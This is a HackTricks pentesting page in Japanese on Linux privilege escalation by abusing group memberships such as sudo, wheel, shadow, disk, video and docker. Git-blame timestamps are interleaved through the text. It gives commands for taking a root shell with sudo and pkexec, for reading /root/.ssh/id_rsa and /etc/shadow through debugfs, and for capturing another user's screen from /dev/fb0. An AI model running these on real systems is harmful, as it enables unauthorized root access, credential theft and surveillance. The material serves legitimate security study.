2022-04-28 16:01:33 +00:00
|
|
|
|
<details>
|
|
|
|
|
|
2023-04-25 18:35:28 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝したいですか?** または、**PEASSの最新バージョンにアクセスしたいですか?** または、**HackTricksをPDFでダウンロードしたいですか?** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
# Sudo/Admin グループ
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
## **PE - 方法1**
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
**時には**、**デフォルトで(または一部のソフトウェアが必要とするために)** **/etc/sudoers** ファイルの中に、次のような行があることがあります:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
# Allow members of group sudo to execute any command
|
|
|
|
|
%sudo ALL=(ALL:ALL) ALL
|
|
|
|
|
|
|
|
|
|
# Allow members of group admin to execute any command
|
|
|
|
|
%admin ALL=(ALL:ALL) ALL
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
これは、**sudoまたはadminグループに所属するユーザーはsudoとして何でも実行できる**ことを意味します。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
もし状況がそうであるなら、**rootになるためには単に以下を実行するだけです**:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```text
|
|
|
|
|
sudo su
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
## PE - メソッド2
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
すべてのsuidバイナリを見つけ、バイナリ**Pkexec**があるかどうかを確認します:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
find / -perm -4000 2>/dev/null
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
もし、バイナリファイルpkexecがSUIDバイナリであり、sudoまたはadminに所属している場合、おそらくpkexecを使用してバイナリをsudoとして実行できるでしょう。
|
|
|
|
|
以下の内容を確認してください:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
cat /etc/polkit-1/localauthority.conf.d/*
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
以下では、どのグループが**pkexec**を実行することが許可されているか、および一部のLinuxではデフォルトで**sudo**または**admin**のいずれかのグループが表示されることがあります。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
**rootになるためには、次のコマンドを実行します**:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
pkexec "/bin/sh" #You will be prompted for your user password
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
もし**pkexec**を実行しようとして、以下の**エラー**が表示された場合:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie
|
|
|
|
|
==== AUTHENTICATION FAILED ===
|
|
|
|
|
Error executing command as another user: Not authorized
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
**権限がないわけではなく、GUIなしで接続されていないためです**。この問題の回避策はこちらにあります:[https://github.com/NixOS/nixpkgs/issues/18012\#issuecomment-335350903](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903)。**2つの異なるsshセッション**が必要です:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
|
|
|
|
{% code title="session1" %}
|
|
|
|
|
```bash
|
|
|
|
|
echo $$ #Step1: Get current PID
|
|
|
|
|
pkexec "/bin/bash" #Step 3, execute pkexec
|
|
|
|
|
#Step 5, if correctly authenticate, you will have a root session
|
|
|
|
|
```
|
|
|
|
|
{% code title="session2" %}
|
|
|
|
|
```bash
|
|
|
|
|
pkttyagent --process <PID of session1> #Step 2, attach pkttyagent to session1
|
|
|
|
|
#Step 4, you will be asked in this session to authenticate to pkexec
|
|
|
|
|
```
|
|
|
|
|
{% endcode %}
|
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
# Wheelグループ
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
**時々**、**デフォルトで**、**/etc/sudoers**ファイルの中にこの行が見つかることがあります:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```text
|
|
|
|
|
%wheel ALL=(ALL:ALL) ALL
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
これは、**wheelグループに所属するユーザーはsudoとして何でも実行できる**ことを意味します。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
もし上記が当てはまる場合、**rootになるためには単に以下を実行するだけです**:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```text
|
|
|
|
|
sudo su
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
# シャドウグループ
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
**シャドウグループ**のユーザーは、**/etc/shadow** ファイルを**読み取る**ことができます。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```text
|
|
|
|
|
-rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
# ディスクグループ
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
この特権は、マシン内のすべてのデータにアクセスできるため、ほぼルートアクセスと同等です。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
ファイル:`/dev/sd[a-z][1-9]`
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```text
|
|
|
|
|
debugfs /dev/sda1
|
|
|
|
|
debugfs: cd /root
|
|
|
|
|
debugfs: ls
|
|
|
|
|
debugfs: cat /root/.ssh/id_rsa
|
|
|
|
|
debugfs: cat /etc/shadow
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
注意してください、debugfsを使用すると**ファイルを書き込む**こともできます。例えば、`/tmp/asd1.txt`を`/tmp/asd2.txt`にコピーするには、次のようにします:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
debugfs -w /dev/sda1
|
|
|
|
|
debugfs: dump /tmp/asd1.txt /tmp/asd2.txt
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
しかし、rootが所有するファイル(`/etc/shadow`や`/etc/passwd`など)を書き込もうとすると、「**Permission denied**」のエラーが発生します。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2022-05-01 12:41:36 +00:00
|
|
|
|
# Video Group
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
コマンド`w`を使用すると、**システムにログインしているユーザー**を見つけることができ、以下のような出力が表示されます:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
|
|
|
|
|
yossi tty1 22:16 5:13m 0.05s 0.04s -bash
|
|
|
|
|
moshe pts/1 10.10.14.44 02:53 24:07 0.06s 0.06s /bin/bash
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
**tty1**は、ユーザー**yossiが物理的に**マシンの端末にログインしていることを意味します。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
**videoグループ**は、画面出力を表示する権限を持っています。基本的に、画面を観察することができます。これを行うには、現在の画面のイメージを生データで取得し、画面が使用している解像度を取得する必要があります。画面データは`/dev/fb0`に保存され、この画面の解像度は`/sys/class/graphics/fb0/virtual_size`で見つけることができます。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
cat /dev/fb0 > /tmp/screen.raw
|
|
|
|
|
cat /sys/class/graphics/fb0/virtual_size
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
**生のイメージ**を**開く**には、**GIMP**を使用し、**`screen.raw`**ファイルを選択し、ファイルタイプとして**生のイメージデータ**を選択します:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
|
|
|
|
![](../../.gitbook/assets/image%20%28208%29.png)
|
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
次に、画面で使用されている幅と高さを変更し、さまざまなイメージタイプを確認します(画面をより良く表示するものを選択します):
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
|
|
|
|
![](../../.gitbook/assets/image%20%28295%29.png)
|
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
# ルートグループ
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
デフォルトでは、**ルートグループのメンバー**は、特権をエスカレートするために使用できる**一部のサービス**の設定ファイルや**ライブラリ**ファイルなど、**他の興味深いもの**を変更することができるようです...
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
**ルートメンバーが変更できるファイルを確認します**:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
find / -group root -perm -g=w 2>/dev/null
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
# Dockerグループ
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
ホストマシンのルートファイルシステムをインスタンスのボリュームにマウントすることができます。そのため、インスタンスが起動するとすぐにそのボリュームに`chroot`がロードされます。これにより、実質的にマシン上でroot権限を取得することができます。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
|
|
|
|
{% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %}
|
|
|
|
|
|
|
|
|
|
{% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %}
|
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
# lxc/lxdグループ
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
[lxc - 特権エスカレーション](lxd-privilege-escalation.md)
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-04-25 18:35:28 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンやHackTricksのPDFをダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**または**Telegramグループ**に**参加**するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出**してください。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|